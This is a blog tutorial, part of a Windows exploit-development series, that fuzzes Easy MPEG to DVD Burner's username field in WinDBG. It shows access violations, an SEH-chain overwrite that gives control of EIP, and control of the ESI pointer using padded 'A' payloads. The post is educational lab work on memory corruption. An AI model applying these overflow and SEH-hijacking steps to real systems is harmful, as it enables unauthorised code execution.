Windows Exploit Development (primer II) : Corrupting Structured Exception Handling and Controlling Memory Pointers


I folks this post is part of a series in which I introduce some good fundamentals in windows exploit development - basically documenting as I learn it myself!

In this post we are going to essentially going to find out how our input breaks certain structures in memory, find different ways to crash the program and discuss the fun things these crashes let us do with out input! Lets get going :)

What you need to get going

Exactly the same as last time!
  • Windows Virtual Machine 
  • Debugger Tools for windows
  • Easy MPEG to DVD Burner (copy available on exploit-db)
  • (optional) python script payloadgen.py mentioned later on in the post

Corrupting Memory


I assume you've got everything sorted out in terms of debugging the application. If its broken in you can get it running after a breaking by using the "g" command like this:



It should start running unless for some reason it hits another breakpoint. Hit "g" as many times are you need to get the application running smoothly and responding to clicks. Once thats going you can start fuzzing it. According to the exploit DB post the Register Function doesn't handle long user name values well. Try inputing 30 characters as a user name value.

To make things simpler when we are looking through memory later, try inserting "A" as in the screenshot below.


You might notice the python script payloadgen.py being used, don't worry this is just a simple script I whipped up when I was setting up the VM because I was too frustrated to use any other tools. This script gives me command line comfortability (because I'm a total command line snob!) and its pretty easy to write it just spits out long strings according to some criteria. I've uploaded it to here https://gist.github.com/k3170makan/2a053b493ed50856cbbf472e146e490b incase you want to give a try. Otherwise you should be totally fine just making long strings on notepad or literally just entering them manually (that just takes some time usually).  Anyway, getting back to our exploit; lets make it crash!
Try entering 50 characters as a User Name! You should see the following happen:

Trigger an access violation - Crash number 1

In the screenshot a couple things are happening. The debugger is telling us an exception has been generated. I'm going to call this crash number 1 - theres another on the way ;) We see that the debugger dropped into thread 0 - this is because it is the thread that was complaining (make sure when using windbg you remain aware of the thread context you are working in!). Its also showing us the code that generated the exception. In the next command I check out the stack and we notice there are bunch of "41"s all over the place - if you suspected this is not normal you're right! What you are seeing are all those "A"s I injected, the program seems to have written them all over its own arguments? How?

Well what happened here was, the string I entered was copied into memory - because it was way too long the string crossed the boundaries between stack frames and replaced some of the data that was there originally. As I discussed in the previous post, the data that holds the arguments for each function that was called , the name of the function that called it etc etc - is all saved on the stack. Why 0x41? Well thats the hex version of the ascii value of the letter "A"!

So because there are a bunch of "A"s lying all over memory an exception was generated. At a high level it means the computer has run into an instruction that doesn't really meant sense making criteria - the conditions of execution (as defined by this architecture) have been violated. Because all the computer does at this level is basic operations on registers and memory locations, usually these errors have to do with how it accesses memory and what it does with it - this is why the error we generated is referred to as an "Access Violation".

Analyzing the Memory Corruption


We can figure out why this happened in a bit but lets look at exactly what the debugger is telling us. The code that generated it is located at 0x001c1b52.

More specifically speaking its a move operation from some double word at the memory location pointed to by the address [ecx+eax*4], which appears to be the address 0xaafaaaf2. The address [ecx+eax*4] can be calculated, you can just ask WinDBG what it is, and it will evaluate it for you, we can also check out what is at this memory address with the "dc" command, here's who I did that:



So it doesn't look like there is anything interesting at this location, probably doesn't even exist in memory! From the command above u eip-0x10 eip  - this command is a super easy way to disassemble the code from 0x10 instructions before eip all the way to the eip value itself.

As another experiment lets look at what happens when we change the fuzz character to a "B", if our theories are correct the exact same thing should happen, involving the same access violation except it should show the hexadecimal of the ascii code for the letter "B", which is 0x42. Here's what happens when you fuzz with a "B":




Yup its definitely exactly our input doing this! No doubt! Actually you should doubt, try every character you can see if it turns out the same way if you're not completely sold.

Notice that though we are triggering the same instruction (or what looks very much like the same instruction ) the memory addresses of that instruction changes! First time around its an exception at 0x60a1b52 and this time its at 0x4471b52?  This is called Address Space Layout Randomization (ASLR) - basically it tries to randomize where code is loaded into memory so that if any memory corruption attacks rely on exploiting a static address they will fail because the address changes every time.

Lets look at how this behaves, I sampled a couple addresses for this crash and looked at how they change every-time, this is what it looked like for 3 runs:


So we got 0x4a1b52 then 0x4561b52 and then 0x49c1b52 there's something odd going on here! ASLR has an R for a reason, why do all these values have a 0x1b52 at the end - thats uhm not random!? I'll cover ASLR bypasses in later posts, for now just realize that its not totally impossibly random ;)

Corrupting Memory II


We have one way to trigger an access violation - this leads to breaking down at code that cannot perform a mov. But that is not to say that this is the only way to cash it. Lets try some other character lengths, so far we know that less than 50 doesn't produce any interesting crashes - lets try 100!

Here's what happens:

Different instruction coming to the party now! I'm gonna call this crash number 2! 

Here we see that when 100 characters are injected it ruins and increment operation targeting the memory location [ecx+0Ch] (here the OCh means OC in hexa-demical, hence the h).  I've also dumped the stack trace in the screenshot so its pretty clear this memory corruption is also caused by copying too many B's into the stack only here we hit a different depth and it spoiled a different instruction! Its important to collect as many ways to crash the program as possible and then work out which ways mean you can control it.

If you continue increasing the fuzz string length, eventually you hit a length of around 1000 and something like this should happen:


Something amazing just happened! The debugger is telling us it cannot execute what is at address 0x42424242! This is because our input some how became the literal pointer to the next instruction! Very exciting because now we actually control the eip - we just need to control it in a meaningful way! You'll notice also I cheated slightly and made the program continue executing after it hit the access violation - the reason I did this is because sneakily I knew that this string was long enough to corrupt another key stack based data structure which controls the behaviour of something called Structured Exception Handling!

Why did I need to pass the debugger another "g" to get this to trigger? Well exception handling happens (at a high level for now) by searching through memory for different indicators about how to deal with certain errors in execution. This is essentially the low level implementation of those fancy try-catch blocks people like to use in C++. Structured Exception Handling (SEH) is essentially a linked list of different code that responds to an exception which is stored at certain locations on the stack. Because again, our string has gobbled up some stack contents it also corrupted the SEH chain! I needed to let it run for a bit because SEH won't try to use my corrupted handler until it has searched through the chain enough - first it triggers the access violation, then the SEH corruption.

Quick way to check the current state of the chain is by either looking at a value in the Thread Environment Block or using some nice short hand in WinDBG, here's how its done:


The !exchain shows the current SEH chain, as you can see we definitely caused some weirdness with the 0x42424242.

So we clearly a we have some control over the registers here (even the instruction register!) directly defined by the values of our input! Either that or the developers should change the name of the program to "Easy arbitrary memory location reader AND MPEG to DVD burner" lol. Beyond just corrupting the memory you might want to play a game where you can point this instruction at an arbitrary place in memory seeing if we can do cool things or control execution? Lets see!

Controlling a Memory Pointer 

Before moving onto full EIP control, I think we should check out what kind of power we have when controlling memory pointers. I think its a much gentler way to introduce the concepts and it makes switching to EIP control easier. The reason I say this is theres a couple caveats to controlling the EIP like other stuff we need to cushion the value in order to make our results observable. We don't need that stuff to see the result of our control with memory pointers - we just point them at different places and see what they do! 

So lets control this memory pointer being corrupted in the mov eax, dword ptr[esi+0C] instruction.
We essentially have control of the esi register. And its being fed to an increment operation. We should be able to force the program to mov from any arbitrary memory location. To do that we need to know how much of our input string is being used eventually as the esi value, this will allow us actual control instead of relying on guess work.

I did a bit of testing and I'm pretty sure 37 characters is close to the length we are looking for lets see what happens when I inject 33 "A"s but add 0x22222222 as the end of the payload. We are using the value on the end of the payload to check how far we are writing into the register our argument ends up in. Check out what happens below:

payload: "A"x33 + "0x22222222"


I actually stumbled on a different crash here! This is crash III. But because it is essentially the exact same flaw as crash II I don't see any use as treating as too unique for the sake of tutorial. 

Whats happening above is the address ended up being 0x2222224d. Obviously this means the argument injected into memory is 0x2222224d - 0C  and this turns out to be 0x22222241. Notice the 0x41 on the end? Yeah thats part of our payload! It means we need to back up a bit and inject 1 less A to get the 0x222222 nice and neatly into the register.  After an adjustment this is what happened to my payload:


As you can see I produce hard confirmation we are at the exact right length. And here's even more. Lets make the value display something cool like 0x13333337. Check it out we can do that as well and just to make sure I'm actually calculating esi correctly I ask WinDBG to dump the value for me:


And viola! You have full control of your first Memory Pointer yaaay! Now point it at random locations in memory and see what happens hehe. Can you make it skip over arbitrary instructions and hit others as you wish - certain values could cause math errors in some places and other not (depends on instruction being exploited!)? Check out if there are memory locations that result in strange or different behaviour when you try them as an esi value. Have fun! 

Comments